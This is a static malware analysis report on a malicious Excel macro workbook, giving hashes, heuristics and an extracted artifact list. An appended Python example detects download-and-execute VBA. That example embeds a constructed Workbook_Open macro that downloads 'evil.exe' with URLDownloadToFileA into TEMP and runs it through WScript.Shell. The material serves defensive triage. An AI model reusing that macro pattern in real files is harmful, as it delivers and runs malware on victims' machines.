Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 16f6c6439c5b9712…

MALICIOUS

Office (OOXML) / .XLSM

Size: 44.1 KB
Created: 2022-06-29 08:40:51 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2022-06-30
MD5: 52c29ebd718c8369dc6ab6b39762c796
SHA-1: 1329529bc7ab983c54e6be7392fb069b82a50f63
SHA-256: 16f6c6439c5b971218b9cd1d616ba40c7cad08c94984ecfde443dfa3c61c6152
Risk Score: 128

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1105 Ingress Tool Transfer

The sample is an XLSM workbook carrying a VBA project (xl/vbaProject.bin). The critical heuristic OLE_VBA_DOWNLOAD fires on the presence of the URLDownloadToFileA function (the urlmon.dll download API), which indicates the macro downloads a file from a URL embedded in the macro. The macro assembles the URL at run time rather than storing it as a single literal; the analyzer reconstructs it as "http://137.123.128.127.134.133.076.seeds/evil.exe". Note that the host portion as shown is neither a valid IPv4 address nor an ordinary hostname, so treat the string as the analyzer's reconstruction of an obfuscated value rather than a confirmed final target. The downloaded file is written to the temporary directory; the Environ() call is consistent with resolving that path from an environment variable such as TEMP. The GetObject call and the actions that follow it suggest the downloaded file is then executed.

Heuristics (4)

  • OLE_VBA_DOWNLOAD (critical): URLDownloadToFile in VBA
  • OLE_VBA_GETOBJ (high): GetObject call
  • OOXML_VBA (medium): VBA project inside OOXML; the document contains a VBA project, so VBA macros are present
  • OLE_VBA_ENVIRON (low): Environ() call (environment variable access)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size: 2200 bytes
  SHA-256: 8012cacf36a788912ce9a7cb8034561aba0a18cc8d734dd5088e8c199b7c48ff

Filename: vbaProject_00.bin
  Kind: vba-project
  Source: OOXML VBA project: xl/vbaProject.bin
  Size: 19968 bytes
  SHA-256: e6ed5961d2e1cb7a9d005a1f8782c34288fb616a7075af14354fee73e00d2850
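As an added worked example (not part of the original report, and not code from the analyzer that produced it), the script below reproduces the triage steps the report describes: carve xl/vbaProject.bin out of the OOXML zip container and hash it, apply the three VBA-source heuristics named above (OLE_VBA_DOWNLOAD, OLE_VBA_GETOBJ, OLE_VBA_ENVIRON), rebuild string literals the macro concatenates with & so a split URL can be recovered, and derive a verdict. The heuristic ids and severities are taken from the report; the regexes, the verdict rule, the SAMPLE_VBA macro (which uses the URL the report reconstructs) and the in-memory demo workbook are constructed for illustration and are not the sample's real macro or the platform's scoring. It operates on already-decoded VBA text such as the macros.bas artifact; decompressing the MS-OVBA streams inside vbaProject.bin itself is left to oletools' olevba, as in the report.

```python
import hashlib
import re
import zipfile
from io import BytesIO

# Heuristic ids and severities mirror the report; the regexes are this example's own.
HEURISTICS = [
    ("OLE_VBA_DOWNLOAD", "critical", re.compile(r"\bURLDownloadToFile[AW]?\b", re.I)),
    ("OLE_VBA_GETOBJ", "high", re.compile(r"\bGetObject\s*\(", re.I)),
    ("OLE_VBA_ENVIRON", "low", re.compile(r"\bEnviron\s*\(", re.I)),
]
SEVERITY_RANK = {"critical": 3, "high": 2, "medium": 1, "low": 0}

# A run of string literals glued with "&" (VBA line continuation " _" allowed).
CONCAT_RE = re.compile(r'"[^"\n]*"(?:\s*&\s*_?\s*"[^"\n]*")+')
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)

# Constructed stand-in for the decoded macro (macros.bas); NOT the sample's actual code.
# The CLSID passed to GetObject is WScript.Shell's, instantiated through the "new:" moniker.
SAMPLE_VBA = r'''
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As LongPtr) As Long

Sub Workbook_Open()
    Dim u As String, p As String
    u = "http://" & "137.123.128" & ".127.134.133" & ".076.seeds" & "/evil.exe"
    p = Environ("TEMP") & "\" & "svc.exe"
    URLDownloadToFileA 0, u, p, 0, 0
    Set o = GetObject("new:" & "72C24DD5-D70A-438B-8A42-98424B88AFB8")
    o.Run p
End Sub
'''


def vba_project_from_ooxml(data: bytes):
    """Carve the embedded VBA project from an OOXML (zip) container.
    Returns (member name, sha256 hex, size) or None when no project is present."""
    with zipfile.ZipFile(BytesIO(data)) as z:
        for info in z.infolist():
            if info.filename.lower().endswith("vbaproject.bin"):
                blob = z.read(info)
                return info.filename, hashlib.sha256(blob).hexdigest(), len(blob)
    return None


def reconstruct_strings(vba: str):
    """Rebuild literals the macro splits across '&' concatenations."""
    return ["".join(re.findall(r'"([^"\n]*)"', m.group(0)))
            for m in CONCAT_RE.finditer(vba)]


def scan_vba(vba: str):
    """Apply the API-call heuristics and pull URLs out of the reassembled strings."""
    hits = [(hid, sev) for hid, sev, pat in HEURISTICS if pat.search(vba)]
    rebuilt = reconstruct_strings(vba)
    urls = sorted({u for s in rebuilt for u in URL_RE.findall(s)})
    return {"heuristics": hits, "reconstructed": rebuilt, "urls": urls}


def verdict(hits, has_vba_project: bool):
    """This example's own rule (not the platform's risk score): a critical hit is
    MALICIOUS, a medium/high hit is SUSPICIOUS, anything else is CLEAN."""
    if has_vba_project:
        hits = hits + [("OOXML_VBA", "medium")]
    top = max((SEVERITY_RANK[s] for _, s in hits), default=-1)
    if top >= SEVERITY_RANK["critical"]:
        return "MALICIOUS", hits
    if top >= SEVERITY_RANK["medium"]:
        return "SUSPICIOUS", hits
    return "CLEAN", hits


def build_demo_xlsm(with_vba: bool = True) -> bytes:
    """Constructed minimal OOXML container; the vbaProject.bin body is a dummy
    OLE2 header plus padding, not a real compressed VBA project."""
    buf = BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        if with_vba:
            z.writestr("xl/vbaProject.bin",
                       b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 56)
    return buf.getvalue()


if __name__ == "__main__":
    proj = vba_project_from_ooxml(build_demo_xlsm())
    result = scan_vba(SAMPLE_VBA)
    label, hits = verdict(result["heuristics"], proj is not None)
    print("vbaProject:", proj)
    print(label, hits)
    print("URLs:", result["urls"])
```

Against the constructed macro the scan reports all three VBA heuristics, adds OOXML_VBA once the carve finds xl/vbaProject.bin, and recovers the concatenated URL in one piece. As in the report, the recovered host does not parse as an IP address or hostname; the string is an indicator to pivot on, not proof of where the download would actually land. For a real sample, feed the decoded source produced by olevba into scan_vba in place of SAMPLE_VBA.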